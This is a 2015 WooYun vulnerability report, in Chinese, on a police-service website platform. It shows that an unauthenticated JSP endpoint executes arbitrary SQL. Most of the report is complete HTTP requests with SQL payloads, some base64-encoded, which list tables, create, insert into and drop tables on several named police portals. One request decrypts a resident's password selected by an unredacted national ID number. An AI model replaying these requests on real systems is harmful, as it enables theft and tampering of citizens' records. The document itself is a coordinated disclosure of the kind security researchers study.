当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0155743

漏洞标题:某敏感部门建站系统存在通用型设计缺陷漏洞(增删改查)

相关厂商:福建天创信息科技有限公司

漏洞作者: 路人甲

提交时间:2015-11-25 13:44

修复时间:2015-12-17 14:48

公开时间:2015-12-17 14:48

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-11-25: 细节已通知厂商并且等待厂商处理中
2015-11-27: 厂商已经确认,细节仅向厂商公开
2015-11-30: 细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航
2016-01-21: 细节向核心白帽子及相关领域专家公开
2016-01-31: 细节向普通白帽子公开
2016-02-10: 细节向实习白帽子公开
2015-12-17: 细节向公众公开

简要描述:

通用型设计缺陷
狗狗侠哥我给你跪了,增删改献上

详细说明:

厂商:福建天创信息科技有限公司
http://**.**.**.**/
系统有的叫网上警局,有的叫公安便民网
关键字:

技术支持:福建天创信息科技有限公司


以官网为例

POST http://**.**.**.**/public/getclientset_evalstr.jsp HTTP/1.1
Accept: */*
Accept-Language: zh-cn
Referer: http://**.**.**.**
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Host: **.**.**.**
Content-Length: 79
Connection: Keep-Alive
Pragma: no-cache
Cookie: JSESSIONID=0000AREvZz6rXhzos056AihiOlx:182f4gpp8
qryObj=qry_judge&sql=select+*+from+v%24version&datasource=tchdb&sendType=myhttp


QQ截图20151125101349.png


所有表,你懂的

QQ截图20151125101513.png


在此演示一下增删改
增表

POST http://**.**.**.**/public/getclientset_evalstr.jsp HTTP/1.1
Accept: */*
Accept-Language: zh-cn
Referer: http://**.**.**.**
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Host: **.**.**.**
Content-Length: 97
Connection: Keep-Alive
Pragma: no-cache
Cookie: JSESSIONID=0000AREvZz6rXhzos056AihiOlx:182f4gpp8
qryObj=qry_judge&sql=create+table+wooyun(id+number(11)+not+null)&datasource=tchdb&sendType=myhttp


我新增了一个叫wooyun的表,查询所有表时,你能够发现这张表存在,0行

QQ截图20151125112238.png


我要往wooyun这张表插入数据

POST http://**.**.**.**/public/getclientset_evalstr.jsp HTTP/1.1
Accept: */*
Accept-Language: zh-cn
Referer: http://**.**.**.**
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Host: **.**.**.**
Content-Length: 86
Connection: Keep-Alive
Pragma: no-cache
Cookie: JSESSIONID=0000AREvZz6rXhzos056AihiOlx:182f4gpp8
qryObj=qry_judge&sql=insert+into+wooyun(id)+values(1)&datasource=tchdb&sendType=myhttp


我往wooyun这张表插入了一条数据,id列为1的
select wooyun

QQ截图20151125112238.png


你会发现1存在
最后我们删除wooyun表

QQ截图20151125112756.png


最后select全表看看wooyun在不在

QQ截图20151125113103.png


你看表删了
其它案例(就不在演示增删改了):
钦州公安便民网http://**.**.**.**

POST http://**.**.**.**/public/getclientset_evalstr.jsp HTTP/1.1
Accept: */*
Accept-Language: zh-cn
Referer: http://**.**.**.**
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Host: **.**.**.**
Content-Length: 72
Connection: Keep-Alive
Pragma: no-cache
Cookie: JSESSIONID=0000miumpwM423HvUeQEH9C79bJ:18u5r5o55
qryObj=qry_judge&sql=select+*+from+tabs&datasource=tchdb&sendType=myhttp


QQ截图20151125102527.png


QQ截图20151125102611.png


福建省流动人口综合信息服务管理平台http://**.**.**.**

POST http://**.**.**.**/szpt/public/getclientset_evalstr.jsp HTTP/1.1
Accept: */*
Accept-Language: zh-cn
Referer: http://**.**.**.**/szpt/ygdw/dwjbxxdjb_edit.jsp#
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Host: **.**.**.**
Content-Length: 79
Connection: Keep-Alive
Pragma: no-cache
Cookie: JSESSIONID=0000AREvZz6rXhzos056AihiOlx:182f4gpp8
qryObj=qry_judge&sql=select+*+from+v%24version&datasource=tchdb&sendType=myhttp


QQ截图20151125103858.png

漏洞证明:

下面这几个版本略有不同,不同之处在于把sql传的参数base64加密了,请问有什么区别
许昌公安网上警局http://**.**.**.**

POST http://**.**.**.**/public/getclientset_evalstr.jsp HTTP/1.1
Accept: */*
Accept-Language: zh-cn
Referer: http://**.**.**.**
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Host: **.**.**.**
Content-Length: 83
Connection: Keep-Alive
Pragma: no-cache
Cookie: JSESSIONID=0000CsMjh0hHnW0P74o02GtE095:18a9khjah; CNZZDATA1253313151=1614302783-1448417605-%7C1448417605
qryObj=this&datasource=tchdb&sql=c2VsZWN0ICogZnJvbSB2JHZlcnNpb24%3D&sendType=myhttp


QQ截图20151125104224.png


QQ截图20151125104308.png


三明网上警局http://**.**.**.**:30001/

POST http://**.**.**.**:30001/public/getclientset_evalstr.jsp HTTP/1.1
Accept: */*
Accept-Language: zh-cn
Referer: http://**.**.**.**:30001
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Host: **.**.**.**:30001
Content-Length: 73
Connection: Keep-Alive
Pragma: no-cache
Cookie: JSESSIONID=0000CsMjh0hHnW0P74o02GtE095:18a9khjah; CNZZDATA1253313151=1614302783-1448417605-%7C1448417605
qryObj=this&datasource=tchdb&sql=c2VsZWN0ICogZnJvbSB0YWJz&sendType=myhttp


QQ截图20151125104408.png


鄂州市公众服务网-网上警局**.**.**.**/

POST http://**.**.**.**/public/getclientset_evalstr.jsp HTTP/1.1
Accept: */*
Accept-Language: zh-cn
Referer: http://**.**.**.**
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Host: **.**.**.**
Content-Length: 72
Connection: Keep-Alive
Pragma: no-cache
Cookie: JSESSIONID=0000CsMjh0hHnW0P74o02GtE095:18a9khjah; CNZZDATA1253313151=1614302783-1448417605-%7C1448417605
qryObj=this&datasource=tchdb&sql=select * from v$version&sendType=myhttp


QQ截图20151125104759.png


这类型错误最可怕的就是可以直接update与delete
以上我仅指出了public/getclientset_evalstr.jsp这个页面
实际上在系统内
public/getclientset_cutrowsetnowin.jsp

POST http://**.**.**.**/public/getclientset_cutrowsetnowin.jsp HTTP/1.1
Accept: */*
Accept-Language: zh-cn
Referer: http://**.**.**.**/csso/write_gtg.jsp?SSOTGT=nO97^1448056406951^350783198801110214^6b8a08d0
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Host: **.**.**.**
Content-Length: 212
Connection: Keep-Alive
Pragma: no-cache
qryObj=this&datasource=tchdb&sql=select%20tc_webjj.fun_uncrypkey%28spwd%29%20as%20spwd%20%20from%20tc_webjj.t_commoner%20where%20pid%20%3D%20%27350783198801110214%27%20and%20sstate%20%3D%20%271%27&sendType=myhttp


也是存在问题的,也许有更多的页面,但传递的参数基本一致,赶紧补丁吧

修复方案:

补丁

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:13

确认时间:2015-11-27 17:57

厂商回复:

CNVD确认并复现所述情况,已经由CNVD通过网站公开联系方式向软件生产厂商通报,涉及案例转由CNCERT发对应分中心处置。

最新状态:

暂无

漏洞评价:

评价